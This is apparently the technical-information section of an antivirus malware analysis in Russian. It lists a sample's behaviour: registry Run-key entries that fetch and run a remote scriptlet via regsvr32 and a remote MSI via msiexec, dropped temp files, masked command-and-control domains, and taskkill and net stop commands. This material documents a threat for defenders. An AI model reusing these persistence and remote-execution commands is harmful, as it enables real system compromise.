Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'start' = 'regsvr32 /u /s /i:http://js.mys2016.info:280/v.sct scrobj.dll'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'start1' = 'msiexec.exe /i http://js.mys2016.info:280/helloworld.msi /q'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'rundll32' = ''
- '' (загружен из сети Интернет)
- '<SYSTEM32>\taskkill.exe' /f /im LSMOSE*
- '<SYSTEM32>\taskkill.exe' /f /im cab*
- '<SYSTEM32>\taskkill.exe' /f /im msinfo*
- '<SYSTEM32>\net.exe' stop MpsSvcc
- '<SYSTEM32>\net.exe' stop Windowscurryus
- cabalmain.exe
- %TEMP%\nsj2.tmp\inetc.dll
- %TEMP%\doc.exe
- %TEMP%\nsj2.tmp\inetc.dll
- 'ip##gger.co':80
- 'kr#s.ru':80
- http://ip##gger.co/1h9PN6.html
- http://kr#s.ru/doc.dat
- DNS ASK ip##gger.co
- DNS ASK kr#s.ru
- ClassName: '' WindowName: ''
- '%TEMP%\doc.exe' -pJavajre_set7z
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im LSMOSE* & tskill LSMOSE*
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im msinfo* & tskill msinfo*
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im cab* & tskill cab*
- '<SYSTEM32>\cmd.exe' /c net stop MpsSvcc
- '<SYSTEM32>\cmd.exe' /c net stop Windowscurryus
- '<SYSTEM32>\net1.exe' stop MpsSvcc
- '<SYSTEM32>\net1.exe' stop Windowscurryus
- '<SYSTEM32>\tskill.exe' msinfo*
- '<SYSTEM32>\tskill.exe' cab*
- '<SYSTEM32>\tskill.exe' LSMOSE*